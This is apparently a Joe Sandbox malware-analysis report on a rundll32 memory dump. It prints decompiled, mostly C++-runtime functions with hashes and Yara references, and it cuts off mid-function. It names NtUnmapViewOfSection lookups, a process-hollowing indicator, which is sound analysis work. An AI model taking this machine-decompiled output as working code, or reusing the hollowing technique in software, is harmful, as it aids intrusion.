                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmoneypunct
                • String ID:
                • API String ID: 18546225-0
                • Opcode ID: 80598fde0bb3a3ce3bf89a3434307d2caafd29aec3bc1fd403d5fcc1c0951c5a
                • Instruction ID: 03e4514fa9fa40e0625bb62bd161fbc021d68b2b1d545d76b563dcc6f76c36a8
                • Opcode Fuzzy Hash: 80598fde0bb3a3ce3bf89a3434307d2caafd29aec3bc1fd403d5fcc1c0951c5a
                • Instruction Fuzzy Hash: 18314B37306E20D1EA219B15E5582E963A5EBE4BE0F584293EE6D076FDDA34D8438700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D9CB4 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205D9CB4(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681c18; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681b58; // 0x0
				if (_t56 != 0) goto 0x205d9d2f;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681b58 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d9d1e;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b58 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681b58; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d9d43;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d9d45;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d9dd2;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d9d6b;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9d69;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d9d6b;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d9dd2;
				if (_t79 == 0) goto 0x205d9d7a;
				goto 0x205d9dd2;
				E00000215215205DC798(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205d9da9;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681c18 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205d9cb4
                0x215205d9cbc
                0x215205d9cc5
                0x215205d9cca
                0x215205d9cd4
                0x215205d9cda
                0x215205d9ce1
                0x215205d9ce6
                0x215205d9cf0
                0x215205d9cf9
                0x215205d9cfe
                0x215205d9d05
                0x215205d9d07
                0x215205d9d0f
                0x215205d9d17
                0x215205d9d23
                0x215205d9d28
                0x215205d9d2f
                0x215205d9d37
                0x215205d9d39
                0x215205d9d41
                0x215205d9d48
                0x215205d9d52
                0x215205d9d54
                0x215205d9d5d
                0x215205d9d5f
                0x215205d9d67
                0x215205d9d6e
                0x215205d9d73
                0x215205d9d78
                0x215205d9d82
                0x215205d9d8b
                0x215205d9d92
                0x215205d9da3
                0x215205d9da8
                0x215205d9da9
                0x215205d9dae
                0x215205d9dbf
                0x215205d9dc7
                0x215205d9deb

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: ff68216057d0b6a146dc5d729bf5b4c090140f84096e764e23b169909508c765
                • Instruction ID: e5a7a8bc397baedea1463cf89a56e59012a726ab1bd283f2a73de7afdb54b29f
                • Opcode Fuzzy Hash: ff68216057d0b6a146dc5d729bf5b4c090140f84096e764e23b169909508c765
                • Instruction Fuzzy Hash: 83316137306E64C1EB21AB16E5582D96765EBE4BE0F280293DE6D077EDDE38D4478700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D1D0C Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205D1D0C(intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t42;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				signed long long _t56;
				intOrPtr _t63;
				intOrPtr* _t77;
				long long _t78;
				void* _t79;

				_t50 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t79 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t78 =  *0x206818f8; // 0x0
				_a24 = _t78;
				_t55 =  *0x206818d8; // 0x0
				if (_t55 != 0) goto 0x205d1d87;
				E00000215215205D19DC(0,  &_a8);
				_t42 =  *0x206818d8 - _t55; // 0x0
				if (_t42 != 0) goto 0x205d1d76;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x206818d8 = _t50;
				_t29 = E00000215215205D1A5C(_t50,  &_a8);
				_t56 =  *0x206818d8; // 0x0
				_t63 = _a8;
				if (_t56 -  *((intOrPtr*)(_t63 + 0x18)) >= 0) goto 0x205d1d9b;
				_t51 =  *((intOrPtr*)(_t63 + 0x10));
				goto 0x205d1d9d;
				if ( *((intOrPtr*)(_t51 + _t56 * 8)) != 0) goto 0x205d1e2a;
				if ( *((intOrPtr*)(_t63 + 0x24)) == dil) goto 0x205d1dc3;
				E00000215215205D6CC0(_t29);
				if (_t56 -  *((intOrPtr*)(_t51 + 0x18)) >= 0) goto 0x205d1dc1;
				_t52 =  *((intOrPtr*)(_t51 + 0x10));
				goto 0x205d1dc3;
				if ( *((intOrPtr*)(_t52 + _t56 * 8)) != 0) goto 0x205d1e2a;
				if (_t78 == 0) goto 0x205d1dd2;
				goto 0x205d1e2a;
				E00000215215205D2824(0, 0, _t56,  &_a24, _t79, _t78, _t79);
				if (_t52 != 0xffffffff) goto 0x205d1e01;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t56,  &_v48, 0x2066bb90, _t78);
				asm("int3");
				_t77 = _a24;
				 *0x206818f8 = _t77;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t77 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t52, _t77),  &_a16);
			}



















                0x215205d1d0c
                0x215205d1d14
                0x215205d1d1d
                0x215205d1d22
                0x215205d1d2c
                0x215205d1d32
                0x215205d1d39
                0x215205d1d3e
                0x215205d1d48
                0x215205d1d51
                0x215205d1d56
                0x215205d1d5d
                0x215205d1d5f
                0x215205d1d67
                0x215205d1d6f
                0x215205d1d7b
                0x215205d1d80
                0x215205d1d87
                0x215205d1d8f
                0x215205d1d91
                0x215205d1d99
                0x215205d1da0
                0x215205d1daa
                0x215205d1dac
                0x215205d1db5
                0x215205d1db7
                0x215205d1dbf
                0x215205d1dc6
                0x215205d1dcb
                0x215205d1dd0
                0x215205d1dda
                0x215205d1de3
                0x215205d1dea
                0x215205d1dfb
                0x215205d1e00
                0x215205d1e01
                0x215205d1e06
                0x215205d1e17
                0x215205d1e1f
                0x215205d1e43

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 9d32b79da59d5c104d6bc5ce0d3d347c89ccd3b94439e08162b083fa72e03bc8
                • Instruction ID: dd7dc4c70a6ff763d5a11e584228347c81f632edf395bd81edf0e2354e95c883
                • Opcode Fuzzy Hash: 9d32b79da59d5c104d6bc5ce0d3d347c89ccd3b94439e08162b083fa72e03bc8
                • Instruction Fuzzy Hash: 2C317F33306E60D1EB20AB16E5582D867A5EBE97E0F180253DE6D476EDDF34D4438704
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D9DEC Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205D9DEC(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681bb8; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681b08; // 0x0
				if (_t56 != 0) goto 0x205d9e67;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681b08 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d9e56;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b08 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681b08; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d9e7b;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d9e7d;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d9f0a;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d9ea3;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9ea1;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d9ea3;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d9f0a;
				if (_t79 == 0) goto 0x205d9eb2;
				goto 0x205d9f0a;
				E00000215215205DC85C(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205d9ee1;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681bb8 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205d9dec
                0x215205d9df4
                0x215205d9dfd
                0x215205d9e02
                0x215205d9e0c
                0x215205d9e12
                0x215205d9e19
                0x215205d9e1e
                0x215205d9e28
                0x215205d9e31
                0x215205d9e36
                0x215205d9e3d
                0x215205d9e3f
                0x215205d9e47
                0x215205d9e4f
                0x215205d9e5b
                0x215205d9e60
                0x215205d9e67
                0x215205d9e6f
                0x215205d9e71
                0x215205d9e79
                0x215205d9e80
                0x215205d9e8a
                0x215205d9e8c
                0x215205d9e95
                0x215205d9e97
                0x215205d9e9f
                0x215205d9ea6
                0x215205d9eab
                0x215205d9eb0
                0x215205d9eba
                0x215205d9ec3
                0x215205d9eca
                0x215205d9edb
                0x215205d9ee0
                0x215205d9ee1
                0x215205d9ee6
                0x215205d9ef7
                0x215205d9eff
                0x215205d9f23

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: ddc823b0c55ebac6424c7150eb9c8b3a4dd77a85adfbbfdd4ed5a563a1c2915b
                • Instruction ID: ac94f8fc14fc3a537a31976b9cde6b0d081bf7269800beb772c0c6506594bf60
                • Opcode Fuzzy Hash: ddc823b0c55ebac6424c7150eb9c8b3a4dd77a85adfbbfdd4ed5a563a1c2915b
                • Instruction Fuzzy Hash: 68314F37306E20C1EB21DB15E5582D96365EBE4BE0F280292DE6D477EDDA34D887C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D1E44 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205D1E44(intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t42;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				signed long long _t56;
				intOrPtr _t63;
				intOrPtr* _t77;
				long long _t78;
				void* _t79;

				_t50 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t79 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t78 =  *0x206818e0; // 0x0
				_a24 = _t78;
				_t55 =  *0x206818d0; // 0x0
				if (_t55 != 0) goto 0x205d1ebf;
				E00000215215205D19DC(0,  &_a8);
				_t42 =  *0x206818d0 - _t55; // 0x0
				if (_t42 != 0) goto 0x205d1eae;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x206818d0 = _t50;
				_t29 = E00000215215205D1A5C(_t50,  &_a8);
				_t56 =  *0x206818d0; // 0x0
				_t63 = _a8;
				if (_t56 -  *((intOrPtr*)(_t63 + 0x18)) >= 0) goto 0x205d1ed3;
				_t51 =  *((intOrPtr*)(_t63 + 0x10));
				goto 0x205d1ed5;
				if ( *((intOrPtr*)(_t51 + _t56 * 8)) != 0) goto 0x205d1f62;
				if ( *((intOrPtr*)(_t63 + 0x24)) == dil) goto 0x205d1efb;
				E00000215215205D6CC0(_t29);
				if (_t56 -  *((intOrPtr*)(_t51 + 0x18)) >= 0) goto 0x205d1ef9;
				_t52 =  *((intOrPtr*)(_t51 + 0x10));
				goto 0x205d1efb;
				if ( *((intOrPtr*)(_t52 + _t56 * 8)) != 0) goto 0x205d1f62;
				if (_t78 == 0) goto 0x205d1f0a;
				goto 0x205d1f62;
				E00000215215205D28E8(0, 0, _t56,  &_a24, _t79, _t78, _t79);
				if (_t52 != 0xffffffff) goto 0x205d1f39;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t56,  &_v48, 0x2066bb90, _t78);
				asm("int3");
				_t77 = _a24;
				 *0x206818e0 = _t77;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t77 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t52, _t77),  &_a16);
			}



















                0x215205d1e44
                0x215205d1e4c
                0x215205d1e55
                0x215205d1e5a
                0x215205d1e64
                0x215205d1e6a
                0x215205d1e71
                0x215205d1e76
                0x215205d1e80
                0x215205d1e89
                0x215205d1e8e
                0x215205d1e95
                0x215205d1e97
                0x215205d1e9f
                0x215205d1ea7
                0x215205d1eb3
                0x215205d1eb8
                0x215205d1ebf
                0x215205d1ec7
                0x215205d1ec9
                0x215205d1ed1
                0x215205d1ed8
                0x215205d1ee2
                0x215205d1ee4
                0x215205d1eed
                0x215205d1eef
                0x215205d1ef7
                0x215205d1efe
                0x215205d1f03
                0x215205d1f08
                0x215205d1f12
                0x215205d1f1b
                0x215205d1f22
                0x215205d1f33
                0x215205d1f38
                0x215205d1f39
                0x215205d1f3e
                0x215205d1f4f
                0x215205d1f57
                0x215205d1f7b

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 9f7d957f0ffcc9841b217795bd5a469e617d2d6f12b071e1f2693da6535ece72
                • Instruction ID: f98c67d53afbabac726312830b956a27d938450cb604960db75a0125d9059d3e
                • Opcode Fuzzy Hash: 9f7d957f0ffcc9841b217795bd5a469e617d2d6f12b071e1f2693da6535ece72
                • Instruction Fuzzy Hash: 04313F33306E60D1EA219B16E5582D96765EBE87E0F184293EE5D077EDCB34D4478704
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D9F24 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205D9F24(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681c20; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681b60; // 0x0
				if (_t56 != 0) goto 0x205d9f9f;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681b60 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d9f8e;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b60 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681b60; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d9fb3;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d9fb5;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205da042;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d9fdb;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9fd9;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d9fdb;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205da042;
				if (_t79 == 0) goto 0x205d9fea;
				goto 0x205da042;
				E00000215215205DC920(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205da019;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681c20 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205d9f24
                0x215205d9f2c
                0x215205d9f35
                0x215205d9f3a
                0x215205d9f44
                0x215205d9f4a
                0x215205d9f51
                0x215205d9f56
                0x215205d9f60
                0x215205d9f69
                0x215205d9f6e
                0x215205d9f75
                0x215205d9f77
                0x215205d9f7f
                0x215205d9f87
                0x215205d9f93
                0x215205d9f98
                0x215205d9f9f
                0x215205d9fa7
                0x215205d9fa9
                0x215205d9fb1
                0x215205d9fb8
                0x215205d9fc2
                0x215205d9fc4
                0x215205d9fcd
                0x215205d9fcf
                0x215205d9fd7
                0x215205d9fde
                0x215205d9fe3
                0x215205d9fe8
                0x215205d9ff2
                0x215205d9ffb
                0x215205da002
                0x215205da013
                0x215205da018
                0x215205da019
                0x215205da01e
                0x215205da02f
                0x215205da037
                0x215205da05b

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 09c5cb08fecbd01b7dc821f050fd5a8b41e5a42a18643bed1a065b9555427e60
                • Instruction ID: 40559181da53615e0b3b040b11dc491f4e87fae1a5bbf400ec29a5c60748aa58
                • Opcode Fuzzy Hash: 09c5cb08fecbd01b7dc821f050fd5a8b41e5a42a18643bed1a065b9555427e60
                • Instruction Fuzzy Hash: 0C314D37306E24C1EA219B26E5582E96365EBE47E0F180293EE5D477EDDF38D8438704
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205C7C20 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 63COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00000215215205C7C20(signed int __edx, void* __eflags, void* __rcx) {
				void* _v72;
				signed char _t8;
				signed int _t10;

				_t10 = __edx & 0x00000017;
				 *(__rcx + 0x10) = _t10;
				_t8 =  *(__rcx + 0x14) & _t10;
				if (__eflags == 0) goto 0x205c7c4c;
				if (r8b != 0) goto 0x205c7c52;
				if ((_t8 & 0x00000004) != 0) goto 0x205c7c5c;
				if ((_t8 & 0x00000002) != 0) goto 0x205c7c99;
				goto 0x205c7cd6;
				return _t8;
			}






                0x215205c7c2c
                0x215205c7c2f
                0x215205c7c32
                0x215205c7c34
                0x215205c7c39
                0x215205c7c41
                0x215205c7c45
                0x215205c7c47
                0x215205c7c51

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionThrow
                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                • API String ID: 432778473-1866435925
                • Opcode ID: 630905e449d0313d16b455eea44e9d9020c95c9599d2484d6dfed617e88adc5d
                • Instruction ID: 595a907979af2b88df1faaf9537c0fa1b6059ba7a99d90c084f80e91658f53c4
                • Opcode Fuzzy Hash: 630905e449d0313d16b455eea44e9d9020c95c9599d2484d6dfed617e88adc5d
                • Instruction Fuzzy Hash: BD216D73B12E3AD8FB11DBA4D8496EC2370BFA0758FA05151DE0A1695EEF38D649C340
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205981E0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 43COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00000215215205981E0() {
				long long _v88;
				void* _t6;

				_v88 = 0xfffffffe;
				if (_t6 - 0x21 > 0) goto 0x20598478;
				goto __rdx;
			}





                0x215205981e7
                0x215205981f3
                0x2152059820e

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ExceptionThrow__std_exception_copy
                • String ID: D:\Sources\boost_1_78_0\boost/beast/http/impl/verb.ipp$G$class boost::basic_string_view<char,struct std::char_traits<char> > __cdecl boost::beast::http::to_string(enum boost::beast::http::verb)$unknown verb
                • API String ID: 1552479455-153460152
                • Opcode ID: 31bdc45c81c5188b2c4fd795f0642223dacc3f422662b668c5e521bef64abdb7
                • Instruction ID: 7b29d86005fbb781b34e800c796825d96b61d8d7e6b8ced5a3e71fd922803189
                • Opcode Fuzzy Hash: 31bdc45c81c5188b2c4fd795f0642223dacc3f422662b668c5e521bef64abdb7
                • Instruction Fuzzy Hash: EB211D32206F80D5DB608B44F4883CAB3A5FBD5364F904266EA9C427ACEF7CD259CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CAB18 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 29libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: NtUnmapViewOfSection$RtlNtStatusToDosError$ntdll.dll
                • API String ID: 667068680-3998908438
                • Opcode ID: 5d0fd9b13a4954da36a0c31dca8b7b335499681a921842a0448eb2911f3ce383
                • Instruction ID: d4b0779ceaf8a7d54ebce75b0fdb60bd1ce5a5b912f34bf67c957af54487807c
                • Opcode Fuzzy Hash: 5d0fd9b13a4954da36a0c31dca8b7b335499681a921842a0448eb2911f3ce383
                • Instruction Fuzzy Hash: ACF04972706E60C9EA149B12F8480997760ABA8FC0F688071EE4E07768DE38D4898700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520613260 Relevance: 9.2, APIs: 6, Instructions: 223COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: 37e1365720e54c170244ded4e590eddda548868e872759c99f8ceb9b79a3041d
                • Instruction ID: c2ae8a4082212b2cc21201b6f898566dd5ee63c108a0c61ad1e940fa61b84734
                • Opcode Fuzzy Hash: 37e1365720e54c170244ded4e590eddda548868e872759c99f8ceb9b79a3041d
                • Instruction Fuzzy Hash: 6991A373602EB0C5FE308B1594887EDE6A6BFA4FA4F284255DE6A167DCDB34E446C300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CA2DC Relevance: 9.1, APIs: 6, Instructions: 124fileCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseCreateErrorHandleLastModuleNamePointerRead
                • String ID:
                • API String ID: 1442449144-0
                • Opcode ID: 84401a0ac56230bcfb6e49264f68de0f237f74cf7f9d6155b434242987c906bc
                • Instruction ID: a843993312532fd788a31b84424a11bf02f8448fb21bc1e080ddde98232b3c48
                • Opcode Fuzzy Hash: 84401a0ac56230bcfb6e49264f68de0f237f74cf7f9d6155b434242987c906bc
                • Instruction Fuzzy Hash: 6341F433703AB1C6EB648B55955CBE96795BFE0BA8F148160AE8943B98EE3CC804C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520593880 Relevance: 9.1, APIs: 6, Instructions: 93COMMON
                Download Yara Rule
                C-Code - Quality: 41%
                			E0000021521520593880(void* __ecx, long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a16, long long _a24) {
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				int _t43;
				long long _t61;
				long long* _t64;
				intOrPtr _t72;
				long long _t83;
				void* _t88;
				intOrPtr _t90;

				_t88 = __r8;
				_t83 = __rsi;
				_a8 = __rcx;
				_v40 = 0xfffffffe;
				_a16 = __rbx;
				_a24 = __rsi;
				_t64 = __rcx;
				 *__rcx = 0x2063c748;
				if ( *((intOrPtr*)(__rcx + 0xa8)) == __rsi) goto 0x205938f2;
				E0000021521520593DF0(0x2063c748, __rcx, __rcx, __rdx);
				E0000021521520591900( *((intOrPtr*)(_t64 + 0xa8)), _t88);
				if ( *((intOrPtr*)(_t64 + 0xa8)) == 0) goto 0x205938eb;
				CloseHandle(??);
				E00000215215205F51EC(0x2063c748, _t64, __rsi);
				 *((long long*)(_t64 + 0xa8)) = _t83;
				if ( *((intOrPtr*)(_t64 + 0xa8)) == 0) goto 0x20593917;
				CloseHandle(??);
				E00000215215205F51EC(0x2063c748, _t64, _t83);
				_t90 =  *((intOrPtr*)(_t64 + 0x90));
				if (_t90 == 0) goto 0x20593979;
				_t72 =  *((intOrPtr*)(_t64 + 0x90));
				if (_t72 == 0) goto 0x2059394a;
				_t61 =  *((intOrPtr*)(_t72 + 0x20));
